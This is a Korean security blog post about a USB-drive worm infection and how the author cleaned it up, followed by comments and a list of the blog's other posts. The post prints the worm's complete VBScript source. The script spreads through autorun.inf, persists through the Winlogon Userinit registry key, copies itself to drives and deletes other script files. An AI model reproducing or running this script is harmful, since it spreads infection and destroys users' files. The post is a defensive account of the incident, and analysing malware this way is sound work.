태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.




요즘 이동디스크를 많이 이용합니다..하지만 안전하게 이용하지 않을 경우 자신도 모르게 PC가 감염되는 것을 볼수 있습니다,..며칠전 이동디스크로 자료를 타 PC에서 옮긴 적이 있습니다.  처음엔 아무런 생각없이 작업을 했었습니다.  일반 사용자들도 유용하게 사용하는 USB인 만큼 실제 경험 사례를 포스팅 해 보겠습니다.


 PC에 꽂고 자료를 보려고 하던중 이상한 메세지와 함께 경고 문구가 올라 옵니다..순간 바이러스나 웜에 감염된 것을 알수 있었습니다..

" 갑작스러운 경고 문구에 이게 무슨일이래? "   

하면서  다행히 백신이 있었기에 검사를 해 보았습니다.

사용자 삽입 이미지
                                               <그림-1 > usb 바이러스 감염 초기화면

그런데

"주소가 잘못 되었다고 나옵니다.."  "난 아무짓도 안했는데...."



주로 감염이 되면 자신도 모르게 브라우져 메인 화면이 위 그림과 같이 변하면 바이러스에 감염이 되었다고
생각하시면 됩니다..


사용자 삽입 이미지

                                       <그림 -2> 백신으로 검색하였을때 감염 발견

그리고 나서 백신으로 검사를 해 보았습니다...아주 바이러스가 바로 걸리더군요...우쒸...무슨 짓을 할지 모르니

사용자 삽입 이미지


                                       <그림-3> 감염 바이러스 세부 감염 조치내역


그리고 바이러스 정보 싸이트에서 어떤 영향을 미치는지 찾아 보니 네트워크 트래픽을 유발 한다고 합니다.
위 그림은 뒤에 버전이 544 인데 548로 보아 변종인 듯 싶습니다..


사용자 삽입 이미지

                                            <그림-4> 감염 스크립트 파일


그리고 이동 디스크에 폴더 보기-->숨김파일 체크를 해제하여 숨김파일 까지 보게 하여 보면 위 그림과 같은 파일이 있었습니다..


메모장을 가지고 그 내용을 보았습니다..


'**********************************************************
'******************** Anti autorun vbscript ***************
'******************** Version 1.01          ***************
'**********************************************************
Option Explicit
On Error Resume Next
Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,Chg
Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv=File.Drive
Set InDrive = Fso.drives
Set ReadAll=File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop
Count=Drv.DriveType
Do
If Not Fso.FileExists(SystemDir & "\killVBS.vbs") then
  set WriteAll = Fso.CreateTextFile(SystemDir & "\killVBS.vbs",2,true)
  WriteAll.Write AllFile
  WriteAll.close
  set WriteAll = Fso.GetFile(SystemDir & "\killVBS.vbs")
  WriteAll.Attributes = -1
End If
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\killVBS.vbs"
For Each Drives In InDrive

If Drives.DriveType=2 Then
   LookVBS "inf",Drives.Path & "\"
   LookVBS "INF",Drives.Path & "\"
End if 

If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
  If Drives.Path<> "A:" Then
      Shells.Regdelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL"
      Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title",""
      Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",""
      Shells.RegWrite "HKCR\vbsfile\DefaultIcon","%SystemRoot%\System32\WScript.exe,2"
      LookVBS "vbs",WinDir & "\"
      LookVBS "vbs",Drives.Path  & "\"
    If Drives.DriveType = 1 Then
     If Drives.Path<>"A:" Then
     If Not Fso.FileExists(Drives.Path & "\killVBS.vbs") Then
       Set WriteAll=Fso.CreateTextFile(Drives.Path & "\killVBS.vbs",2,True)
       WriteAll.Write AllFile
       WriteAll.Close
       Set WriteAll = Fso.GetFile(Drives.Path & "\killVBS.vbs")
       WriteAll.Attributes = -1
       End If
      
       If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then
          Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")
          Chg.Attributes = -8
          Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
          WriteAll.writeline "[autorun]"
          WriteAll.WriteLine "shellexecute=wscript.exe killVBS.vbs"
          WriteAll.Close
          Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
          WriteAll.Attributes = -1
       else
          Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
          WriteAll.writeline "[autorun]"
          WriteAll.WriteLine "shellexecute=wscript.exe killVBS.vbs"
          WriteAll.Close
          Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
          WriteAll.Attributes = -1
       End if
       End If
     End if
  End if 
  End If
  Next
  if Count <> 1 then
Wscript.sleep 10000
end if
loop while Count<>1
 sub LookVBS(File2Find, SrchPath)
    Dim oFileSys, oFolder, oFile,Cut,Delete
    Set oFileSys = CreateObject("Scripting.FileSystemObject")
    Set oFolder = oFileSys.GetFolder(SrchPath)
    For Each oFile In oFolder.Files
    Cut=Right(oFile.Name,3)
    If UCase(Cut)=UCase(file2find) Then
      If oFile.Name <> "killVBS.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
     End If
    Next
 End sub

 

내용을 보니 대충 알것 같았습니다.. 그것은 wscript 시스템 파일을 killVBS 파일로 바꾸어 변조시키고 이 파일을 레지스트리 깊숙이 넣어서 재부팅을 해도 지속적으로 활동하게 만들었습니다..


사용자 삽입 이미지
                          
                                 <그림-5> usb 꽂으면 자동실행 파일


이동디스크 숨김파일을 전부 보면 이렇게 자동으로 실행하는 파일을 만들게 하였는데 wscript 파일이 killVBS파일로 동작하게끔 만들어 졌었습니다.

그리고 나서 백신으로 치료를 했는데 분명히 치료가 되었다고 하여도 또 그대로 입니다...무슨 문제일까요?

그래서 이동디스크를 파일을 백업을 받고 나서 빠른 포멧을 시켰습니다...그래도 동일합니다...그건 이동디스크가 점유하고 있는 디스크가 플러그인 되자 마자 클릭을 해 보면 열리지 않고 또 경고 문구가 나옵니다.

이동디스크 바이러스에 대한 가장 일반적인 형태입니다..그래서 이번에 아예 빠른 포멧이 아닌 정상적인 포멧을 하였습니다..그랬더니 이번에 아무 문제가 없었습니다.

이동디스크는 치료가 되었지만 PC에 있는 파일 제거가 문제였습니다...




사용자 삽입 이미지

그렇게 해서 살펴 보던중 비슷한 경험을 하여 적어 놓은 것을 검색하여 찾게 되었습니다..

관련 싸이트 :  killVBS.vbs 수동으로 제거 하기 

위 방법대로 하고 나니 가장 문제였던 window -->system32-->killVBS라는 스크립트 파일이 wscript 파일로 원래 파일로 돌아왔습니다..무슨 파일인지는 잘 모르겠으나 분명 윈도우 시스템 파일이었습니다.

그 사실은 감염되었을때 같은 아이콘이 killVBS라고 되었고 날짜도 오늘 날짜였습니다..하지만 수동으로 제거를 하고 나니 같은 아이콘인데 wscript 파일로 되어 있었으며 날짜도 2004년 날짜로 되어 있었습니다..

바이러스, 웜 , 아무리 조심해도 어쩔수 없나 봅니다..그래서 무엇보다 최신 백신을 설치하고 이동디스크는 플러그인 할때 꼭 백신 검사를 해 보시기 바랍니다...꼭이요.,..이거 찾고 하느라고 꽤 많은 시간을 허비 하였습니다.


흔히 usb 하면 이동디스크로 간편하게 잘 사용하고 있지만 지금 처럼 감염이 되면 네트워크에 부하을 일으키는 주범이 되기도 하고, 또는 중요한 파일을 넣어가지고 다닐때 분실하면 많은 자료 유출에 우려 사항도 있습니다.
따라서  usb를 사용하더라도 분실과 바이러스 감염에 대응 할수 있는 방안으로 폴더에 암호를 건다든지 보안 usb를 사용한다든지 하는 usb에 대한 보안마인드를 평소 가져야 겠습니다.


여러분들도 수고를 덜으시라고 포스팅 해 봅니다... 바이러스야 물러가라~~~~워이~~~




 

이올린에 북마크하기(0) 이올린에 추천하기(0)

Writer profile  엔시스
-----------------------------------------------------------------------------------
- 보안인닷컴 대표운영자 (http://www.boanin.com)
- 보안인닷컴 팀블로그 치프로거 (http://blog.boanin.com)
- 한국정보보호진흥원 ISMS 인증심사원
- 한국CISSP협회 홍보분과 이사/ 지경부 IT멘토링 멘토
**********************************************************************************************************
본 포스팅의 저작권은 엔시스에 있으며 상업적 이용을 배제하며 콘텐츠 이용시에는
반드시 출처와 링크를 이용해 주시기 바랍니다. 무단도용은 저작권법에 저촉을 받습니다..

**********************************************************************************************************

-한RSS추가를 하시거나 추천을 하시면 더 많은 분들에게 전달되어 구독될수 있습니다.


Posted by 엔시스

트랙백 주소 :: http://www.sis.pe.kr/trackback/1649 관련글 쓰기

댓글을 달아 주세요

  1. BlogIcon 엔시스 2007/10/29 17:39  댓글주소  수정/삭제  댓글쓰기

    왠지 바이러스 걸렸다고 생각하니 찜찜해서 무얼 할수가 없더군요..그래서 시간이 좀 허비 되었네요..조금 더 지켜 봐야겠습니다..^^

  2. BlogIcon 엔시스 2007/10/30 11:12  댓글주소  수정/삭제  댓글쓰기

    제가 쓴 내용을 한글자도 틀리지 않고 그대로 가져갔군요..

    http://blog.daum.net/bobodong/5343599

    우선 댓글로 출처를 요구하였으나 지켜 보겠습니다..

    10/30 가져가신 블로거님께서 출처를 밝히셨습니다.
    감사합니다..

  3. BlogIcon Buzz 2007/10/30 11:11  댓글주소  수정/삭제  댓글쓰기

    엔시스님의 해당포스트가 10/30일 버즈블로그 메인 헤드라인으로 링크되었습니다.

  4. BlogIcon 개미탐험가 2008/09/02 08:13  댓글주소  수정/삭제  댓글쓰기

    좋은 정보 잘 보았습니다. 그런데..

    http://boanchanggo.tistory.com/50

    여기도 비슷한(?) 내용이 있네요.. 한번 가서 확인해 보세요..

    구글에서 USB wscript 로 검색했었습니다.

스마트폰 고민하다가 아이폰 질렀습니다.

작년 아이폰 도입을 두고 본인도 많은 고민을 했습니다. 스마트 폰을 장만하려고 하는데 그놈의 약정 때문에 아무래도 약정이 노예 계약은 아닌지..~~ 그것때문에 보조금이 지원되니.....

동네 가장 싼 주유소는 어디이지?

요즘 스마트폰이 이야기가 많아서 아이폰 어플중에 주유소를 찾아 주는 어플도 있더군요. 하지만 아직까지 스마트폰을 가지고 계시지 않은 분은 오즈에서 주유소를 검색해 주소 가격을.....

오즈에서 벤쿠버 동계 올림픽을

오즈로 벤쿠버 동계 올림픽에 대한 궁금증을 풀수 있습니다. 지난번 사진 캡쳐 해 놓았다가 지금 포스팅 하게 되네요. 외부에서 근무하는 사람들은 사실 tv 보기가 쉽지는 않지요......

정보보호관리체계(ISMS) 인증 취득 기업에 대한 사후관리에 대한 사업공고가 KISA 홈페이지에 올라 왔네요..정보보호관리체계 인증을 받은 기업이 점점 늘어 날수록 이에 대한.....

방통위, 스마트폰 보안 관련 ‘이용자 10대 안전수칙’ 발표 방송통신위원회(위원장 최시중)는 최근 스마트폰 사용이 급증하고 이와 관련된 보안위협 가능성이 커짐에 따라 스마트폰.....

사상구국제화센터 뭐 하는 곳일까?

어제 사상구 국제화 센터에서 하는 학부모 설명회에 다녀 왔습니다. 큰아이가 이제 초등학교에 들어가기 때문에 영어 공부에 대한 관심 때문이죠...이제 육아교육에 대한 신경을 써야.....

최근 스마트폰이 열풍을 일으키고 있기에 이제는 웹이 아닌 모바일에서 블로그를 접할 기회가 많아 졌습니다. 그런 의미에서 '스마트폰과 블로그 글쓰기'란 주제로 한번 포스팅 해.....

KSIA에서 학술지를 창간하는군요. 평소 정책 제언이나 제안 그리고 관심있던 내용을 조금 더 구체적이고 객관적인 형태인 논문을 통하여 자신의 의견을 전달 할 수 있는 통로가.....

지난번 2010/02/17 - [Security Policy] - 보안, 어려서부터 교육하고 사명감은 필수 -보안인닷컴 설문결과 를 통하여 일반인들에게 어떻게 하면 보안문화 인.....

MS, 컴퓨터 백신 무료로 오늘부터 제공한다.

MS가 백신을 무료로 제공한다. MS에 따르면 http://www.microsoft.com/security_essentials/ 사이트에서 무료로 백신을 다운로드 받아 설치 할.....

보안, 어려서부터 교육하고 사명감은 필수 -보안인닷컴 설문결과

국내 최대 보안커뮤니티인 보안인닷컴(http://www.boanin.com) 에서 회원들을 대상으로 "일반인 보안인식제고를 위한 가장 좋은 방법"을 묻는 질문에 의외에 답변이.....

오즈에서 가격 비교를 -쇼퍼

오늘 오즈를 사용하다가 추천 사이트 2개 나간다...하나는 방금 소개 하였고 또 다른 하나는 가격비교 사이트이다. 이제는 유선 인터넷에 접속하지 않아도 무선으로 모바일에서 가격.....

손안에 들어온 오즈 추천사이트 -M25

지방에서 살고 있는 사람으로 M25가 무가지라는 것은 최근에 알았다. 이리 저리 살펴 보다가 괜찮은 콘텐츠가 있어 오프라인이 아닌 직접 웹에서 읽어 보고 있다. 그런데 이것이.....

오랜만에 블로그에 대한 글을 한번 적어 보고자 한다. 지금까지 블로그를 운영해 온지 어언 4년정도 지났는듯 하다. 그동안 많은 일들이 있었고 꾸준함을 가지고 성실히 운영해 왔다.....

KISA 테스트 메일 받으신 분 있나요?

키사에서 보낸 테스트 메일이 왔는데 시스템 시험 중인지 아니면 무슨 일인지 모르겠지만 그 사유를 알려 주면 좋을텐데 아직까지 아무런 말이 없군요.. 아마 저 말고도 많은 분들이.....

우린 어떠한 기준에 있어 최소한의 기준에 부합하면 그 기준을 통과 한것으로 간주를 한다. 이를 '합격' 또는 '인증' '패스' ...여러가지 용어로 혼합하여 사용을 한다. 최소.....

" 이젠 정보보호(보안) 잘 하는 사람과 잘 못하는 사람은 구별 하여야 한다" 아이폰 때문에 'S/W 육성책'이라 하여 몇조씩 투입한다고 합니다. 그동안 S/W 인력들 사실 찬.....

대표이사나 CEO(최고경영자)라고 하면 직원 입장에선 아무래도 부담이 되는 인물이다. 그러기에 더욱 다가갈수 없는 부분들이 많다. 그렇지만 CEO들은 고독하고 외롭다고들 한다......

[칼럼] 이젠 투명한 기업과 개인만이 살아 남는다

우린 정보의 홍수시대에 살고 있다. 뉴스, 방송, 언론, 신문, 무가지, 인터넷등 다양한 채널을 가지고 정보를 접하고 있다. 그런 가운데 이제는 새로운 쇼셜네트워크서비스 성장함.....

[칼럼] SNS 보안위협과 대응방안

오프라인 물리적 보안에 대한 내용을 주로 다루고 있는 '시큐리티월드'에 [SNS 보안위협과 대응방안] 이라는 글을 기고를 하였습니다. 해당 세션은 IT보안따라잡기 중에 하나인데.....

전자신문에 기고한 글이 올라 왔네요. http://www.boan.com/news/articleView.html?idxno=1419 정보보호관리체계에 대한 글입니다. 체계를 세.....

이웃 블로거인 mark 님 블로그에서 사기성 스팸메일을 보고 같이 홍보하고자 좀 퍼왔습니다. 사기성 스팸메일은 다음과 같네요.. Dear Account Owner This em.....

부산역 광장의 새로운 모습

부산역 광장이 새로운 모습으로 바뀌고 있습니다. 저는 매일같이 부산역 광장앞을 지나 퇴근을 하기 때문에 볼수 있는 광경인데요. 지난해 광장을 새로운 모습으로 만든다고 구조물로.....

책 읽을려고 새로 책장 마련했다.

지금까지 책을 그리 가까이 하지 않았기에 그렇다고 해서 전혀 읽지 않은 것은 아니지만 올해부터는 정말 책을 좀 가까이 해봐야 할 것 같아서 큰 맘먹고 책장을 하나 준비를 했다......

출처: KISA 홈페이지 2010년도 본인확인조치 의무자 선정결과 공시 (공시기간 : 2010.2.2 ~ 2010.3.31) 개 요 정보통신망법 시행령 제30조에 따라 2010.....

지난 29일 정보통신망 이용촉진 및 정보보호등에 관한 법률 일부개정 시행 유예기간이 종료됨에 따라 이젠 개인정보보호를 안전하게 하는 조치를 취해야 한다. 이를 위반 할시에는 2.....

한국인터넷진흥원(KISA) "광주전남" 이전 승인 확정

국토해양부는 최근 공기업 선진화 방안중 통폐합된 공공기관중 7곳을 이전 확정 하였다. 관련 내용은 아래 여기에서 확인 하시면 됩니다. 간단하게 캡쳐를 해 보았습니다. KISA.....

오즈 버스교통정보, 언제 버스가 올려나?

누굴기다릴때는 단 10분도 1시간처럼 느껴진다. 최근 대중교통을 많이 이용하고 있기에 그러한 느낌은 더 잘 알수 있다. 그런데 오즈 서비스에서 이러한 버스교통정보를 제공해 주고.....

오즈 운세풀이, 오늘은 일하는 날

세월이 많이 흘렀다. 예전에는 심심풀이 땅콩으로 자주 보던 운세풀이. 일간 신문이 오면 그날 운세부터 재미삼아 있어 보던때가 생각이 난다. 사실, 난 운세 같은 것은 자꾸 믿지.....

해쉬값을 볼수 있는 툴입니다... http://beeblebrox.org/hashtab/...

안철수교수가 말하는  기업가(起業家) 정신이란?

" 새로운 가치나 일자리를 창출하는 사람" 다양한 직업을 거쳐 카이스트 석좌 교수로 계시는 '안철수 교수님' , V3 를 만들고 보안 하면 떠오르는 사람. 안철수 교수님이 지난.....

The Security Compliance Management Toolkit Series builds on previous Solution Accelerators to prov.....

스마트폰과 보안

2009년 아이폰이 국내에 도입이 되면서 모바일 인터넷이 활기를 찾고 있다. 또한 정부도 의욕적으로 모바일 인터넷 활용을 장려하고 있다. 그것은 지금까지 전세계적으로 인정받은.....

국내에서 정보보호관리체계는 두개로 나누어 볼수 있습니다. 하나는 한국인터넷진흥원( 이하 KISA)가 시행하는 K-ISMS가 있고 또 다른 하나는 BSI에서 시행하는 ISO270.....

개인정보보호에 불씨를 당겨준 '옥션의 개인정보보호 유출 사건' 어제 법정에 판결이 났습니다. 우려스러운 마음으로 개인정보보호에 대한 개인 생각을 정리 해 보았습니다. 관련기사.....

올해에 들어서 1주일에 책 한권 읽기를 목표로 하고 있습니다. 올한해 최소 50권 책을 읽기로 목표를 잡고 있습니다. 다른 사람들에 비하여 아주 보잘것 없는 독서량이지만 스스로.....

출처: 꼬알라 하얀집 BranchCache 얼리 아답터 가이드 Windows Server 2008 R2 원격 데스크톱 서비스 데이터시트 Windows Server 2008 R2.....

윈도우2008-R2 버전의 세부 기능을 요약 정리한 자료입니다. 유용하게 사용하세요.....

일시적으로 막혀버린 코레일 인터넷 예매 홈페이지

오늘 설날 기차표 인터넷 예매를 하는 날입니다. 우연히 트위터를 하다가 6시부터 인터넷 예매인데 홈페이지가 다운이 되었다는 소리를 듣고 한번 홈페이지를 방문해 보았습니다. 최소.....

최근 년초에 들어서 보안 이슈중에 강력한 이슈 두가지가 대두 되었습니다. 하나는 D일보에서 [단독 보도]라고 하면서 보도한 " 노트북 도청" 에 대한 이슈이고 또 다른 하나는.....

안랩 2010년 2-3개 업체 M&A 시사

안철수연구소가 2010년 공격적인 인수합병(M&A)를 예고하고 나섰다. 확보한 실탄만 약 1천억원이란다. 이를 기반으로 올해 2~3개의 업체를 인수하겠다는 방침이다. - 출처:.....

검색하다가 작년 2009년 5월에 캘리포니아에서 있었던 컨퍼런스 동영상입니다. 괜찮은 내용들이 몇개 있던거 같은데 시간상 전부 보질 못했습니다. 아래는 레이어1 컨퍼런스에 대한.....

보안중에서 가장 기본적인 것이 패스워드를 얼마나 강력하게 하느냐의 문제가 많이 있습니다. 가장 합법적인 해킹수단이 바로 아이디/패스워드를 알아내서 로그인 하는 것이겠죠. 또한.....

[초보보안-12강] DHCP 프로토콜이란?

인터넷을 사용하려면 일정한 길을 찾아가야 서버에서 정보를 얻어 올수 있다. 이러한 일정한 길을 찾아가는 것 중에 가장 중요한 것이 바로 "IP" 이다. IP주소는 현재 V4로.....

[독서리뷰-18] 세상에서 가장 안전한 이름-안철수연구소

지난 송년모임때 선물 받은 책이 있었습니다. 그것은 '세상에서 가장 안전한 이름' 안철수 연구소에 대한 자서전적인 이야기를 제3의 시각으로 풀어내는 책이었습니다. 세상에서 가장.....

드디어 OZ 트위터가 나왔네요.

OZ 무한자유 요금제를 사용하고 있기에 그동안 모바일 인터넷을 잘 하지 못한 것을 마음껏 하고 있습니다. 하지만 그것도 매일같이 휴대폰만 들여다 보는 것이 아니기에 1G를 모두.....

보안인(人) 닷컴, 송년모임 - 뜨거운 열기속으로

지난 12월중순 서울에서 "보안인닷컴" 연말 송년 모임이 있었습니다. 그때 함께 하였던 회원들 사진 자료입니다. 이 사진은 모 기자분이 촬영하여서 똑딱이 보다 훨씬 화질이 좋네.....